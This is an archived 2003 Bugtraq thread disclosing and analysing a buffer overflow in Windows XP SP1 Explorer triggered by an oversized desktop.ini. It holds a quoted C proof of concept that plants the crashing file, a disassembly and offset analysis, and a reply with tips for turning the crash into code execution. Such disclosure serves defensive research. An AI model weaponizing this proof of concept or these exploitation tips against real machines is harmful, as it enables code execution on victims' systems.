Message-ID: <20030514202001.861A.NESUMIN@softhome.net>
Date: Wed, 14 May 2003 20:27:24 +0900
From: nesumin <nesumin@...thome.net>
To: bugtraq@...urityfocus.com
Subject: Re: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
Hello,
> Due to the size limitation set by the 800H as well as the fact that the
> overflowing string is converted to Unicode, the chance for executing a
> malicious code (Unicode exploit code as well as exploitable RET address) is
> very limited. That is the reason we are documenting it in detail here.
I could create the exploit code on my Japanese Windows XP SP1.
Perhaps, I think, you can easily create the full exploit code
by the following:
* You can directly specify all overwritten data without thinking about
the UNICODE conversion if you create the "desktop.ini" as "UTF-16".
(Adding BOM and encoding "[.ShellClassInfo]\x0d\x0a".)
* You can get the code area of about 0xFF4 bytes.
(Before and after RET address)
Best Regards.
---------------------------------
nesumin <nesumin@...thome.net>
-----Original Message-----
From: "Executable Security" <exurity@...ers.com>
Sent: Sun, 11 May 2003 03:28:54 -0500
To: <bugtraq@...urityfocus.com>
Subject: Detailed analysis: Buffer overflow in Explorer.exe on Windows XP SP1
> Hi, there:
>
> We were able to duplicate what was reported by Kristopher Matthews and aT4r
> InsaN3. Actually, if you have the following test scenario:
>
> File/Dir               Explanation
> C:\
> C:\temp\desktop.ini    Overflowing text file
> C:\test                directory
>
> The c:\temp\desktop.ini is the buffer-overflowing text file. Then, it
> crashes not only Explorer.exe, but also Internet Explorer.exe, and
> application programs (it crashed UltraEdit) that use the file-open dialog box
> trying to scan the c:\ hard drive. However, you can do the following safely
> from a DOS prompt for the directory c:\test
>
> Explorer c:\test
>
> Of course, you cannot browse C:\test from the Explorer.exe GUI starting with
> C:\ root directory because of the overflowing c:\temp\desktop.ini file.
> Actually, I assume the overflowing file, no matter where it is located in
> the subdirectory, will crash the Explorer.exe starting with any directory
> higher above the overflowing desktop.ini file. (did not fully test though).
>
> Down to the assembly level, this bug lies in the shell32.dll file as such:
>
> 7740F3C3 lea eax, [ebp-21Ch] ; full path to the filename \desktop.in
> 7740F3C9 push eax
> 7740F3CA push 800h ; should be 400h I believe
> 7740F3CF lea eax, [ebp-0A1Ch]
> 7740F3D5 push eax
> 7740F3D6 push offset a_shellclassinf ; ".ShellClassInfo"
> 7740F3DB call ds:GetPrivateProfileSectionW
>
> When GetPrivateProfileSectionW is called, it assumes the buffer to be as
> large as two times 800h. As you can see, the local buffer is only A1C -
> 21C = 800H for this string. So, it overflows if the desktop.ini contains a
> long string. MSDN documents the third parameter for GetPrivateProfileSection
> as such:
>
> nSize
> Specifies the size, in characters, of the buffer pointed to by the
> lpReturnedString parameter.
>
> To be precise, the buffer overflowing structure for this bug is such:
>
> | --------------------- A1C ---------| EBP | RET | -----------------> higher address
>
> The replaceable RET address is located at (A1C+4)/2 = 510.
>
> Due to the size limitation set by the 800H as well as the fact that the
> overflowing string is converted to Unicode, the chance for executing a
> malicious code (Unicode exploit code as well as exploitable RET address) is
> very limited. That is the reason we are documenting it in detail here.
>
> We do not know how this bug affects shell32.dll files on other Windows
> versions.
>
> With due credits to those who wrote the emails quoted below.
>
> Peter Huang
> http://members.rogers.com/exurity/
>
> -----Original Message-----
> From: Kristopher Matthews [mailto:krism@...lsnare.net]
> Sent: Friday, May 09, 2003 11:43 AM
> To: 'Ryan Yagatich'
> Cc: vuln-dev@...urityfocus.com
> Subject: RE: Buffer overflow in Explorer.exe
>
> I have tested and duplicated this behavior on a fully patched/updated
> Windows XP Pro system.
>
> 1. The overflow is for that particular key, AFAICT.
> 1a. It will not work for the root (c:/) directory; explorer.exe does not
> parse 'desktop.ini' for that directory. It will, however, work for any other
> directory.
> 2. It crashes explorer.exe (which runs the task bar/start menu, etc) - It
> looks for all the world like a standard buffer overflow; I believe a more
> carefully crafted 'desktop.ini' file could cause explorer.exe to
> unintentionally execute arbitrary code.
> 3. Download and execute untrusted code? Combine this with any of the other
> popular exploits for windows; also, it wouldn't be terribly hard to get a
> user to download a 'desktop.ini' file to their "My Documents" directory (in
> the guise of, say, a folder theme, which windows does support; e.g.
> different background, file layout, etc); bam, whenever they open that
> directory, explorer crashes.
>
> Regards,
> Kristopher
>
>
> -----Original Message-----
> From: Ryan Yagatich [mailto:ryany@...tek.com]
> Sent: Thursday, May 08, 2003 6:28 PM
> To: at4r@...esign.es
> Cc: vuln-dev@...urityfocus.com
>
> Hi,
> I don't quite understand the purpose behind this code. It creates
> a read only file '/aT4r[at]3WDesign.es Security/desktop.ini' with the
> contents of
>
> [.ShellClassInfo]
> AAAAAAAAAAAA {x2301}
>
>
> And then terminates? I don't have a windows machine available to
> really explore this any, but what makes that entry in desktop.ini cause
> this? Furthermore, is this issue only for that particular key or is it
> generally just key/excessive parameter/missing value size that is
> affected? And additionally, you mention that explorer will no longer be
> able to operate when trying to browse the hard disk, but does this mean
> globally, or when they try to browse the c:/ drive, or just that
> particular folder?
> Please send me more information about this, (even if it references
> past posts that I have missed) so that I can better understand the
> severity of this. Especially since to me, I still see it as someone needing
> to download and execute untrusted software which causes a system crash,
> and if that were going to happen there are far worse things that can be
> done besides creating a small text file.
>
> Thanks,
> Ryan Yagatich
>
>
> ,_____________________________________________________,
> \ Ryan Yagatich support@...tek.com \
> / Pantek Incorporated (877) LINUX-FIX /
> \ http://www.pantek.com/security (440) 519-1802 \
> / Are your networks secure? Are you certain? /
> \___E8354282324E636DB5FF7B8A6EDED51FD02C06C68D3DB695___\
>
> On Wed, 7 May 2003, aT4r InsaN3 wrote:
>
> >This bug allows a malicious attacker to execute data with privileges of a user that is browsing the hard disk with explorer.
> >
> >tested against winxp SP1
> >
> >example code provided.
> >
> <snip>
> >
> > strcpy(path,"\\aT4r[at]3WDesign.es Security");
> > mkdir(path);
> > SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
> >
> > strcat(path,"\\desktop.ini");
>
> > bof=fopen(path,"w");
> > fputs("[.ShellClassInfo]\n",bof);
> > memset(evil,'A',BUFF);
> > fputs(evil,bof);
> > fclose(bof);
> <snip>
>
> -----Original Message-----
> From: aT4r InsaN3 [mailto:at4r@...mail.com]
> Sent: Wednesday, May 07, 2003 3:54 PM
> To: vuln-dev@...urityfocus.com
> Subject: Buffer overflow in Explorer.exe
>
> This bug allows a malicious attacker to execute data with privileges of a
> user that is browsing the hard disk with explorer.
>
> tested against winxp SP1
>
> example code provided.
>
>
> /*
>
> Buffer Overflow in explorer.exe - Proof of Concept
> Tested only against: Windows XP SP1
>
> Found by aT4r@...esign.es
>
> Greetings to:
> - #Haxorcitos@...et= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
> - #localhost and #darknet
>
>
> Usage: just execute this file.
> This code will crash your explorer every time you try to browse your harddisk
> execute this program again to delete the evil file ;-)
>
> (3ec.464): Access violation - code c0000005 (first chance)
> First chance exceptions are reported before any exception handling.
> This exception may be expected and handled.
> eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70 edi=000ece90
> eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na po nc
> cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246
> 00410041 ?? ???
>
> 3W Design Security 2003. http://www.3WDesign.es/
> */
>
>
> #include <direct.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <windows.h>
> #include <sys/stat.h>
>
> #define BUFF 2300
> int main(void){
>
>   char path[256];
>   char evil[BUFF+1]="";   /* BUFF 'A's plus the terminating NUL */
>   FILE *bof;
>   struct stat st;
>   printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . .. ...: \tProof of Concept (aT4r@...esign.es)\t:... .. .\n\n");
>   strcpy(path,"\\aT4r[at]3WDesign.es Security");
>   mkdir(path);
>   SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);
>
>   strcat(path,"\\desktop.ini");
>   if (stat(path,&st)==0)
>   { remove(path); exit(1);}//just execute this program twice to remove this file :P
>   bof=fopen(path,"w");
>   if (bof==NULL) { perror(path); return 1; }
>   fputs("[.ShellClassInfo]\n",bof);
>   memset(evil,'A',BUFF);
>   fputs(evil,bof);
>   fclose(bof);
>   printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);
>
>   return 0;
> }
>